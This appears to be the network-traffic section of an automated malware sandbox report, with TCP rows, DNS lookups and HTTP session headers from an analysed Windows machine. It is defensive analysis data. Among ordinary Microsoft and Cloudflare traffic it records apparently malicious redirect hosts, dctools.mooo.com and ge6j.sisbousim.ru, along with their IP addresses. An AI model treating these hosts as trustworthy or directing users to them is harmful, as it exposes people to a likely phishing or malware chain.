                                                                              Oct 3, 2024 03:16:07.388159037 CEST44349805104.18.95.41192.168.2.4
                                                                              Oct 3, 2024 03:16:07.388462067 CEST49805443192.168.2.4104.18.95.41
                                                                              Oct 3, 2024 03:16:07.388581991 CEST49805443192.168.2.4104.18.95.41
                                                                              Oct 3, 2024 03:16:07.388613939 CEST44349805104.18.95.41192.168.2.4
                                                                              Oct 3, 2024 03:16:08.081746101 CEST49806443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:16:08.081866026 CEST44349806104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:16:08.082055092 CEST49806443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:16:08.082583904 CEST49806443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:16:08.082616091 CEST44349806104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:16:08.850310087 CEST44349805104.18.95.41192.168.2.4
                                                                              Oct 3, 2024 03:16:08.850812912 CEST49805443192.168.2.4104.18.95.41
                                                                              Oct 3, 2024 03:16:08.850876093 CEST44349805104.18.95.41192.168.2.4
                                                                              Oct 3, 2024 03:16:08.851355076 CEST44349805104.18.95.41192.168.2.4
                                                                              Oct 3, 2024 03:16:08.851670980 CEST49805443192.168.2.4104.18.95.41
                                                                              Oct 3, 2024 03:16:08.851788998 CEST49805443192.168.2.4104.18.95.41
                                                                              Oct 3, 2024 03:16:08.851800919 CEST44349805104.18.95.41192.168.2.4
                                                                              Oct 3, 2024 03:16:08.891520023 CEST49805443192.168.2.4104.18.95.41
                                                                              Oct 3, 2024 03:16:08.891578913 CEST44349805104.18.95.41192.168.2.4
                                                                              Oct 3, 2024 03:16:09.008934021 CEST44349805104.18.95.41192.168.2.4
                                                                              Oct 3, 2024 03:16:09.009067059 CEST44349805104.18.95.41192.168.2.4
                                                                              Oct 3, 2024 03:16:09.009310007 CEST49805443192.168.2.4104.18.95.41
                                                                              Oct 3, 2024 03:16:09.009871006 CEST49805443192.168.2.4104.18.95.41
                                                                              Oct 3, 2024 03:16:09.009931087 CEST44349805104.18.95.41192.168.2.4
                                                                              Oct 3, 2024 03:16:09.333745003 CEST44349806104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:16:09.334407091 CEST49806443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:16:09.334470987 CEST44349806104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:16:09.335589886 CEST44349806104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:16:09.336460114 CEST49806443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:16:09.336644888 CEST44349806104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:16:09.336935997 CEST49806443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:16:09.337142944 CEST49806443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:16:09.337188959 CEST44349806104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:16:09.337312937 CEST49806443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:16:09.337327003 CEST44349806104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:16:09.337517023 CEST49806443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:16:09.337558031 CEST44349806104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:16:09.596802950 CEST44349806104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:16:09.596924067 CEST44349806104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:16:09.597035885 CEST44349806104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:16:09.597110987 CEST44349806104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:16:09.597183943 CEST44349806104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:16:09.597251892 CEST49806443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:16:09.597251892 CEST49806443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:16:09.597265005 CEST44349806104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:16:09.597321987 CEST44349806104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:16:09.597368002 CEST49806443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:16:09.597421885 CEST44349806104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:16:09.597505093 CEST49806443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:16:09.597520113 CEST44349806104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:16:09.597600937 CEST44349806104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:16:09.597686052 CEST49806443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:16:09.597698927 CEST44349806104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:16:09.642981052 CEST49806443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:16:09.642992973 CEST44349806104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:16:09.687843084 CEST44349806104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:16:09.687889099 CEST44349806104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:16:09.688050032 CEST44349806104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:16:09.688124895 CEST49806443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:16:09.688203096 CEST44349806104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:16:09.688247919 CEST49806443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:16:09.688512087 CEST44349806104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:16:09.688610077 CEST44349806104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:16:09.688642979 CEST49806443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:16:09.688658953 CEST44349806104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:16:09.688730955 CEST49806443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:16:09.688745022 CEST44349806104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:16:09.688920975 CEST44349806104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:16:09.689004898 CEST49806443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:16:09.689553022 CEST49806443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:16:09.689584017 CEST44349806104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:16:09.709151983 CEST49807443192.168.2.4104.18.95.41
                                                                              Oct 3, 2024 03:16:09.709203005 CEST44349807104.18.95.41192.168.2.4
                                                                              Oct 3, 2024 03:16:09.709292889 CEST49807443192.168.2.4104.18.95.41
                                                                              Oct 3, 2024 03:16:09.709533930 CEST49807443192.168.2.4104.18.95.41
                                                                              Oct 3, 2024 03:16:09.709547997 CEST44349807104.18.95.41192.168.2.4
                                                                              Oct 3, 2024 03:16:10.310698986 CEST44349807104.18.95.41192.168.2.4
                                                                              Oct 3, 2024 03:16:10.310982943 CEST49807443192.168.2.4104.18.95.41
                                                                              Oct 3, 2024 03:16:10.311013937 CEST44349807104.18.95.41192.168.2.4
                                                                              Oct 3, 2024 03:16:10.311471939 CEST44349807104.18.95.41192.168.2.4
                                                                              Oct 3, 2024 03:16:10.311728954 CEST49807443192.168.2.4104.18.95.41
                                                                              Oct 3, 2024 03:16:10.311805964 CEST44349807104.18.95.41192.168.2.4
                                                                              Oct 3, 2024 03:16:10.311861038 CEST49807443192.168.2.4104.18.95.41
                                                                              Oct 3, 2024 03:16:10.359401941 CEST44349807104.18.95.41192.168.2.4
                                                                              Oct 3, 2024 03:16:10.375590086 CEST49807443192.168.2.4104.18.95.41
                                                                              Oct 3, 2024 03:16:10.454310894 CEST44349807104.18.95.41192.168.2.4
                                                                              Oct 3, 2024 03:16:10.454472065 CEST44349807104.18.95.41192.168.2.4
                                                                              Oct 3, 2024 03:16:10.454849958 CEST49807443192.168.2.4104.18.95.41
                                                                              Oct 3, 2024 03:16:10.456322908 CEST49807443192.168.2.4104.18.95.41
                                                                              Oct 3, 2024 03:16:10.456343889 CEST44349807104.18.95.41192.168.2.4
                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Oct 3, 2024 03:13:38.083650112 CEST6123353192.168.2.41.1.1.1
                                                                              Oct 3, 2024 03:13:40.211046934 CEST138138192.168.2.4192.168.2.255
                                                                              Oct 3, 2024 03:13:51.423434973 CEST53520311.1.1.1192.168.2.4
                                                                              Oct 3, 2024 03:13:51.500762939 CEST5713353192.168.2.41.1.1.1
                                                                              Oct 3, 2024 03:13:51.500763893 CEST5614553192.168.2.41.1.1.1
                                                                              Oct 3, 2024 03:13:51.508115053 CEST53619551.1.1.1192.168.2.4
                                                                              Oct 3, 2024 03:13:51.740706921 CEST53571331.1.1.1192.168.2.4
                                                                              Oct 3, 2024 03:13:51.903966904 CEST53561451.1.1.1192.168.2.4
                                                                              Oct 3, 2024 03:13:52.497541904 CEST53606161.1.1.1192.168.2.4
                                                                              Oct 3, 2024 03:13:52.806117058 CEST4919753192.168.2.41.1.1.1
                                                                              Oct 3, 2024 03:13:52.806294918 CEST6037653192.168.2.41.1.1.1
                                                                              Oct 3, 2024 03:13:52.934639931 CEST53603761.1.1.1192.168.2.4
                                                                              Oct 3, 2024 03:13:52.934658051 CEST53491971.1.1.1192.168.2.4
                                                                              Oct 3, 2024 03:13:53.693803072 CEST6119553192.168.2.41.1.1.1
                                                                              Oct 3, 2024 03:13:53.693993092 CEST5133453192.168.2.41.1.1.1
                                                                              Oct 3, 2024 03:13:53.778929949 CEST53513341.1.1.1192.168.2.4
                                                                              Oct 3, 2024 03:13:53.821914911 CEST53611951.1.1.1192.168.2.4
                                                                              Oct 3, 2024 03:13:54.345913887 CEST5274053192.168.2.41.1.1.1
                                                                              Oct 3, 2024 03:13:54.346133947 CEST5776053192.168.2.41.1.1.1
                                                                              Oct 3, 2024 03:13:54.458168030 CEST53577601.1.1.1192.168.2.4
                                                                              Oct 3, 2024 03:13:54.472297907 CEST53527401.1.1.1192.168.2.4
                                                                              Oct 3, 2024 03:13:55.266697884 CEST5232153192.168.2.41.1.1.1
                                                                              Oct 3, 2024 03:13:55.266841888 CEST5826353192.168.2.41.1.1.1
                                                                              Oct 3, 2024 03:13:55.267569065 CEST5253653192.168.2.41.1.1.1
                                                                              Oct 3, 2024 03:13:55.267782927 CEST5259053192.168.2.41.1.1.1
                                                                              Oct 3, 2024 03:13:55.268239975 CEST5828653192.168.2.41.1.1.1
                                                                              Oct 3, 2024 03:13:55.268404007 CEST4921953192.168.2.41.1.1.1
                                                                              Oct 3, 2024 03:13:55.273269892 CEST53523211.1.1.1192.168.2.4
                                                                              Oct 3, 2024 03:13:55.273379087 CEST53582631.1.1.1192.168.2.4
                                                                              Oct 3, 2024 03:13:55.274292946 CEST53525361.1.1.1192.168.2.4
                                                                              Oct 3, 2024 03:13:55.274517059 CEST53525901.1.1.1192.168.2.4
                                                                              Oct 3, 2024 03:13:55.274718046 CEST53582861.1.1.1192.168.2.4
                                                                              Oct 3, 2024 03:13:55.275340080 CEST53492191.1.1.1192.168.2.4
                                                                              Oct 3, 2024 03:13:56.043178082 CEST5150853192.168.2.41.1.1.1
                                                                              Oct 3, 2024 03:13:56.043308973 CEST5337653192.168.2.41.1.1.1
                                                                              Oct 3, 2024 03:13:56.049977064 CEST53515081.1.1.1192.168.2.4
                                                                              Oct 3, 2024 03:13:56.050021887 CEST53533761.1.1.1192.168.2.4
                                                                              Oct 3, 2024 03:13:56.133950949 CEST6057053192.168.2.41.1.1.1
                                                                              Oct 3, 2024 03:13:56.134061098 CEST5136053192.168.2.41.1.1.1
                                                                              Oct 3, 2024 03:13:56.141169071 CEST53605701.1.1.1192.168.2.4
                                                                              Oct 3, 2024 03:13:56.141802073 CEST53513601.1.1.1192.168.2.4
                                                                              Oct 3, 2024 03:13:56.213922024 CEST5050453192.168.2.41.1.1.1
                                                                              Oct 3, 2024 03:13:56.214160919 CEST6491953192.168.2.41.1.1.1
                                                                              Oct 3, 2024 03:13:56.221941948 CEST53649191.1.1.1192.168.2.4
                                                                              Oct 3, 2024 03:13:56.222410917 CEST53505041.1.1.1192.168.2.4
                                                                              Oct 3, 2024 03:13:56.762058020 CEST6029953192.168.2.41.1.1.1
                                                                              Oct 3, 2024 03:13:56.762314081 CEST5243353192.168.2.41.1.1.1
                                                                              Oct 3, 2024 03:13:56.768881083 CEST53602991.1.1.1192.168.2.4
                                                                              Oct 3, 2024 03:13:56.769412994 CEST53524331.1.1.1192.168.2.4
                                                                              Oct 3, 2024 03:13:56.781536102 CEST6129353192.168.2.41.1.1.1
                                                                              Oct 3, 2024 03:13:56.781625986 CEST5207553192.168.2.41.1.1.1
                                                                              Oct 3, 2024 03:13:56.788114071 CEST53520751.1.1.1192.168.2.4
                                                                              Oct 3, 2024 03:13:56.788229942 CEST53612931.1.1.1192.168.2.4
                                                                              Oct 3, 2024 03:13:58.617300987 CEST6275053192.168.2.41.1.1.1
                                                                              Oct 3, 2024 03:13:58.617300987 CEST6287653192.168.2.41.1.1.1
                                                                              Oct 3, 2024 03:13:58.624003887 CEST53627501.1.1.1192.168.2.4
                                                                              Oct 3, 2024 03:13:58.624670029 CEST53628761.1.1.1192.168.2.4
                                                                              Oct 3, 2024 03:14:03.877701998 CEST53646471.1.1.1192.168.2.4
                                                                              Oct 3, 2024 03:14:09.535209894 CEST53502421.1.1.1192.168.2.4
                                                                              Oct 3, 2024 03:14:28.515665054 CEST53510211.1.1.1192.168.2.4
                                                                              Oct 3, 2024 03:14:51.282572031 CEST53569211.1.1.1192.168.2.4
                                                                              Oct 3, 2024 03:14:51.587692022 CEST53573611.1.1.1192.168.2.4
                                                                              Oct 3, 2024 03:15:19.698476076 CEST53581861.1.1.1192.168.2.4
                                                                              Oct 3, 2024 03:16:02.651086092 CEST5064653192.168.2.41.1.1.1
                                                                              Oct 3, 2024 03:16:02.651211977 CEST6203153192.168.2.41.1.1.1
                                                                              Oct 3, 2024 03:16:02.658195972 CEST53506461.1.1.1192.168.2.4
                                                                              Oct 3, 2024 03:16:02.658252001 CEST53620311.1.1.1192.168.2.4
                                                                              Oct 3, 2024 03:16:04.427054882 CEST6540353192.168.2.41.1.1.1
                                                                              Oct 3, 2024 03:16:04.427165031 CEST5713753192.168.2.41.1.1.1
                                                                              Oct 3, 2024 03:16:04.434473991 CEST53654031.1.1.1192.168.2.4
                                                                              Oct 3, 2024 03:16:04.435568094 CEST53571371.1.1.1192.168.2.4
                                                                              Oct 3, 2024 03:16:06.169347048 CEST53521841.1.1.1192.168.2.4
                                                                              TimestampSource IPDest IPChecksumCodeType
                                                                              Oct 3, 2024 03:13:51.904196978 CEST192.168.2.41.1.1.1c295(Port unreachable)Destination Unreachable
                                                                              Oct 3, 2024 03:15:21.102246046 CEST192.168.2.41.1.1.1c233(Port unreachable)Destination Unreachable
                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                              Oct 3, 2024 03:13:38.083650112 CEST192.168.2.41.1.1.10x5a28Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                              Oct 3, 2024 03:13:51.500762939 CEST192.168.2.41.1.1.10x6a72Standard query (0)web.nvcc.comA (IP address)IN (0x0001)false
                                                                              Oct 3, 2024 03:13:51.500763893 CEST192.168.2.41.1.1.10x368cStandard query (0)web.nvcc.com65IN (0x0001)false
                                                                              Oct 3, 2024 03:13:52.806117058 CEST192.168.2.41.1.1.10x469bStandard query (0)dctools.mooo.comA (IP address)IN (0x0001)false
                                                                              Oct 3, 2024 03:13:52.806294918 CEST192.168.2.41.1.1.10xce8aStandard query (0)dctools.mooo.com65IN (0x0001)false
                                                                              Oct 3, 2024 03:13:53.693803072 CEST192.168.2.41.1.1.10x6c16Standard query (0)ge6j.sisbousim.ruA (IP address)IN (0x0001)false
                                                                              Oct 3, 2024 03:13:53.693993092 CEST192.168.2.41.1.1.10x54a3Standard query (0)ge6j.sisbousim.ru65IN (0x0001)false
                                                                              Oct 3, 2024 03:13:54.345913887 CEST192.168.2.41.1.1.10x5e05Standard query (0)dctools.mooo.comA (IP address)IN (0x0001)false
                                                                              Oct 3, 2024 03:13:54.346133947 CEST192.168.2.41.1.1.10x955cStandard query (0)dctools.mooo.com65IN (0x0001)false
                                                                              Oct 3, 2024 03:13:55.266697884 CEST192.168.2.41.1.1.10xc38cStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                              Oct 3, 2024 03:13:55.266841888 CEST192.168.2.41.1.1.10xbde6Standard query (0)code.jquery.com65IN (0x0001)false
                                                                              Oct 3, 2024 03:13:55.267569065 CEST192.168.2.41.1.1.10x55ebStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                              Oct 3, 2024 03:13:55.267782927 CEST192.168.2.41.1.1.10xe395Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                              Oct 3, 2024 03:13:55.268239975 CEST192.168.2.41.1.1.10x8223Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                              Oct 3, 2024 03:13:55.268404007 CEST192.168.2.41.1.1.10xe973Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                              Oct 3, 2024 03:13:56.043178082 CEST192.168.2.41.1.1.10xad01Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                              Oct 3, 2024 03:13:56.043308973 CEST192.168.2.41.1.1.10xaf1eStandard query (0)www.google.com65IN (0x0001)false
                                                                              Oct 3, 2024 03:13:56.133950949 CEST192.168.2.41.1.1.10x13d8Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                              Oct 3, 2024 03:13:56.134061098 CEST192.168.2.41.1.1.10xc9a0Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                              Oct 3, 2024 03:13:56.213922024 CEST192.168.2.41.1.1.10xb6abStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                              Oct 3, 2024 03:13:56.214160919 CEST192.168.2.41.1.1.10xb934Standard query (0)code.jquery.com65IN (0x0001)false
                                                                              Oct 3, 2024 03:13:56.762058020 CEST192.168.2.41.1.1.10x350fStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                              Oct 3, 2024 03:13:56.762314081 CEST192.168.2.41.1.1.10xdb1eStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                              Oct 3, 2024 03:13:56.781536102 CEST192.168.2.41.1.1.10xd9b3Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                              Oct 3, 2024 03:13:56.781625986 CEST192.168.2.41.1.1.10xffabStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                              Oct 3, 2024 03:13:58.617300987 CEST192.168.2.41.1.1.10xca3fStandard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                              Oct 3, 2024 03:13:58.617300987 CEST192.168.2.41.1.1.10x8d0aStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                              Oct 3, 2024 03:16:02.651086092 CEST192.168.2.41.1.1.10x610dStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                              Oct 3, 2024 03:16:02.651211977 CEST192.168.2.41.1.1.10x48c1Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                              Oct 3, 2024 03:16:04.427054882 CEST192.168.2.41.1.1.10x3966Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                              Oct 3, 2024 03:16:04.427165031 CEST192.168.2.41.1.1.10x1baeStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              Oct 3, 2024 03:13:38.090914011 CEST1.1.1.1192.168.2.40x5a28No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                              Oct 3, 2024 03:13:38.769996881 CEST1.1.1.1192.168.2.40x136aNo error (0)windowsupdatebg.s.llnwi.net46.228.146.128A (IP address)IN (0x0001)false
                                                                              Oct 3, 2024 03:13:38.769996881 CEST1.1.1.1192.168.2.40x136aNo error (0)windowsupdatebg.s.llnwi.net46.228.146.0A (IP address)IN (0x0001)false
                                                                              Oct 3, 2024 03:13:51.740706921 CEST1.1.1.1192.168.2.40x6a72No error (0)web.nvcc.comneponsetvalleymacoc.weblinkconnect.comCNAME (Canonical name)IN (0x0001)false
                                                                              Oct 3, 2024 03:13:51.740706921 CEST1.1.1.1192.168.2.40x6a72No error (0)neponsetvalleymacoc.weblinkconnect.com104.18.246.141A (IP address)IN (0x0001)false
                                                                              Oct 3, 2024 03:13:51.740706921 CEST1.1.1.1192.168.2.40x6a72No error (0)neponsetvalleymacoc.weblinkconnect.com104.18.244.141A (IP address)IN (0x0001)false
                                                                              Oct 3, 2024 03:13:51.740706921 CEST1.1.1.1192.168.2.40x6a72No error (0)neponsetvalleymacoc.weblinkconnect.com104.18.248.141A (IP address)IN (0x0001)false
                                                                              Oct 3, 2024 03:13:51.740706921 CEST1.1.1.1192.168.2.40x6a72No error (0)neponsetvalleymacoc.weblinkconnect.com104.18.247.141A (IP address)IN (0x0001)false
                                                                              Oct 3, 2024 03:13:51.740706921 CEST1.1.1.1192.168.2.40x6a72No error (0)neponsetvalleymacoc.weblinkconnect.com104.18.245.141A (IP address)IN (0x0001)false
                                                                              Oct 3, 2024 03:13:51.903966904 CEST1.1.1.1192.168.2.40x368cNo error (0)web.nvcc.comneponsetvalleymacoc.weblinkconnect.comCNAME (Canonical name)IN (0x0001)false
                                                                              Oct 3, 2024 03:13:51.903966904 CEST1.1.1.1192.168.2.40x368cNo error (0)neponsetvalleymacoc.weblinkconnect.com65IN (0x0001)false
                                                                              Oct 3, 2024 03:13:52.934658051 CEST1.1.1.1192.168.2.40x469bNo error (0)dctools.mooo.com192.185.163.42A (IP address)IN (0x0001)false
                                                                              Oct 3, 2024 03:13:53.778929949 CEST1.1.1.1192.168.2.40x54a3No error (0)ge6j.sisbousim.ru65IN (0x0001)false
                                                                              Oct 3, 2024 03:13:53.821914911 CEST1.1.1.1192.168.2.40x6c16No error (0)ge6j.sisbousim.ru188.114.96.3A (IP address)IN (0x0001)false
                                                                              Oct 3, 2024 03:13:53.821914911 CEST1.1.1.1192.168.2.40x6c16No error (0)ge6j.sisbousim.ru188.114.97.3A (IP address)IN (0x0001)false
                                                                              Oct 3, 2024 03:13:54.472297907 CEST1.1.1.1192.168.2.40x5e05No error (0)dctools.mooo.com192.185.163.42A (IP address)IN (0x0001)false
                                                                              Oct 3, 2024 03:13:55.273269892 CEST1.1.1.1192.168.2.40xc38cNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                              Oct 3, 2024 03:13:55.273269892 CEST1.1.1.1192.168.2.40xc38cNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                              Oct 3, 2024 03:13:55.273269892 CEST1.1.1.1192.168.2.40xc38cNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                              Oct 3, 2024 03:13:55.273269892 CEST1.1.1.1192.168.2.40xc38cNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                              Oct 3, 2024 03:13:55.274292946 CEST1.1.1.1192.168.2.40x55ebNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                              Oct 3, 2024 03:13:55.274292946 CEST1.1.1.1192.168.2.40x55ebNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                              Oct 3, 2024 03:13:55.274517059 CEST1.1.1.1192.168.2.40xe395No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                              Oct 3, 2024 03:13:55.274718046 CEST1.1.1.1192.168.2.40x8223No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                              Oct 3, 2024 03:13:55.274718046 CEST1.1.1.1192.168.2.40x8223No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                              Oct 3, 2024 03:13:55.275340080 CEST1.1.1.1192.168.2.40xe973No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                              Oct 3, 2024 03:13:56.049977064 CEST1.1.1.1192.168.2.40xad01No error (0)www.google.com172.217.18.100A (IP address)IN (0x0001)false
                                                                              Oct 3, 2024 03:13:56.050021887 CEST1.1.1.1192.168.2.40xaf1eNo error (0)www.google.com65IN (0x0001)false
                                                                              Oct 3, 2024 03:13:56.141169071 CEST1.1.1.1192.168.2.40x13d8No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                              Oct 3, 2024 03:13:56.141169071 CEST1.1.1.1192.168.2.40x13d8No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                              Oct 3, 2024 03:13:56.141802073 CEST1.1.1.1192.168.2.40xc9a0No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                              Oct 3, 2024 03:13:56.222410917 CEST1.1.1.1192.168.2.40xb6abNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                              Oct 3, 2024 03:13:56.222410917 CEST1.1.1.1192.168.2.40xb6abNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                              Oct 3, 2024 03:13:56.222410917 CEST1.1.1.1192.168.2.40xb6abNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                              Oct 3, 2024 03:13:56.222410917 CEST1.1.1.1192.168.2.40xb6abNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                              Oct 3, 2024 03:13:56.768881083 CEST1.1.1.1192.168.2.40x350fNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                              Oct 3, 2024 03:13:56.768881083 CEST1.1.1.1192.168.2.40x350fNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                              Oct 3, 2024 03:13:56.769412994 CEST1.1.1.1192.168.2.40xdb1eNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                              Oct 3, 2024 03:13:56.788114071 CEST1.1.1.1192.168.2.40xffabNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                              Oct 3, 2024 03:13:56.788229942 CEST1.1.1.1192.168.2.40xd9b3No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                              Oct 3, 2024 03:13:56.788229942 CEST1.1.1.1192.168.2.40xd9b3No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                              Oct 3, 2024 03:13:58.624003887 CEST1.1.1.1192.168.2.40xca3fNo error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                              Oct 3, 2024 03:16:02.658195972 CEST1.1.1.1192.168.2.40x610dNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                              Oct 3, 2024 03:16:02.658195972 CEST1.1.1.1192.168.2.40x610dNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                              Oct 3, 2024 03:16:02.658252001 CEST1.1.1.1192.168.2.40x48c1No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                              Oct 3, 2024 03:16:04.434473991 CEST1.1.1.1192.168.2.40x3966No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                              Oct 3, 2024 03:16:04.434473991 CEST1.1.1.1192.168.2.40x3966No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                              Oct 3, 2024 03:16:04.435568094 CEST1.1.1.1192.168.2.40x1baeNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                              • fs.microsoft.com
                                                                              • armmf.adobe.com
                                                                              • slscr.update.microsoft.com
                                                                              • web.nvcc.com
                                                                              • dctools.mooo.com
                                                                              • https:
                                                                                • ge6j.sisbousim.ru
                                                                                • cdnjs.cloudflare.com
                                                                                • code.jquery.com
                                                                                • challenges.cloudflare.com
                                                                              • a.nel.cloudflare.com
                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.449738184.28.90.27443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-03 01:13:32 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept: */*
                                                                              Accept-Encoding: identity
                                                                              User-Agent: Microsoft BITS/7.8
                                                                              Host: fs.microsoft.com
                                                                              2024-10-03 01:13:32 UTC466INHTTP/1.1 200 OK
                                                                              Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                              Content-Type: application/octet-stream
                                                                              ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                              Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                              Server: ECAcc (lpl/EF06)
                                                                              X-CID: 11
                                                                              X-Ms-ApiVersion: Distribute 1.2
                                                                              X-Ms-Region: prod-neu-z1
                                                                              Cache-Control: public, max-age=55938
                                                                              Date: Thu, 03 Oct 2024 01:13:32 GMT
                                                                              Connection: close
                                                                              X-CID: 2


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.449739184.28.90.27443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-03 01:13:33 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept: */*
                                                                              Accept-Encoding: identity
                                                                              If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                              Range: bytes=0-2147483646
